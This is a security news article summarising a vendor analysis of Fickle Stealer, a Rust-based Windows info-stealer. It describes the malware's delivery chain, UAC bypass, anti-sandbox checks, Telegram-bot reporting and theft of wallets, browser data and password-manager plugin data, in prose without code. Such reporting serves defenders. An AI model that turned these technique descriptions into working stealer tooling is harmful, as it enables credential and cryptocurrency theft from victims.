A new Rust-based stealer malware, Fickle Stealer, targets Windows machines and utilizes multiple techniques for delivery, including VBA macros and downloaders, by leveraging Rust’s complex assembly code to potentially evade detection.
After bypassing User Account Control (UAC) with PowerShell scripts in some instances, it performs anti-analysis checks and gathers system information.
It then communicates with a command and control server to receive a target list, which can include cryptocurrency wallets, browser data, and application-specific files, where the stolen information is exfiltrated in a JSON format.
Fickle Stealer malware utilizes various methods for delivery, where VBA droppers are Word documents with macros that execute encoded scripts from XML files, downloading the malware to the Temp folder.
VBA downloaders come in three forms: one directly downloads the PowerShell script (u.ps1 or bypass.ps1), another uses forfiles.exe to bypass detection, and the third leverages a web browser control to download the script indirectly.
Link downloaders deliver the malicious script through a direct link, while executable downloaders masquerade as legitimate applications, such as a PDF viewer, to deploy the PowerShell script. All these methods typically download the PowerShell script for further action.
Preparatory Work for Infection
The attackers use a malicious MMC file (WmiMgmt.msc) that leverages a Shockwave Flash Object from ActiveX to launch a web server on localhost, which delivers a webpage containing a script that configures exclusions for Fickle Stealer and downloads it for execution.
The script exploits trusted directory paths and MMC’s language search priority to achieve persistence with elevated privileges. Another script, engine.ps1, searches for executable files on specific drives and injects shellcode via inject.ps1 to download u.ps1.
To maintain communication, all three scripts (u.ps1, engine.ps1, and inject.ps1) periodically download and execute tgmes.ps1 to send their status and victim information (country, city, IP, OS version, computer name, and username) to the attacker’s Telegram bot.
Fickle Stealer employs various anti-analysis techniques to evade detection in sandbox environments by checking for a debugger, terminating the process if one is present, and comparing process names and loaded DLLs against blacklists of known analysis tools.
It queries the system for specific virtual machine hardware IDs and WMI objects, exiting if results are null as expected in virtual environments, and verifies the system’s hardware UUID against a blacklist to identify potential analysis systems.
According to Fortinet, it targets various data based on server instructions, and exfiltrates entire folders containing crypto wallets (AtomicWallet, Exodus, etc.) identified by the “wallet::” tag. Additionally, it searches for plugin data (Authenticator, Bitwarden, etc.) marked with the “plugin___” tag within specified directories.
For file extensions, it grabs files with extensions like.txt,.docx, and.pdf in user profiles, while searching for specific subfolders within AppData paths (e.g., Discord, Chrome) for potential login data files (discord_dblist.txt) marked with the “grabg::” tag.
Also Read: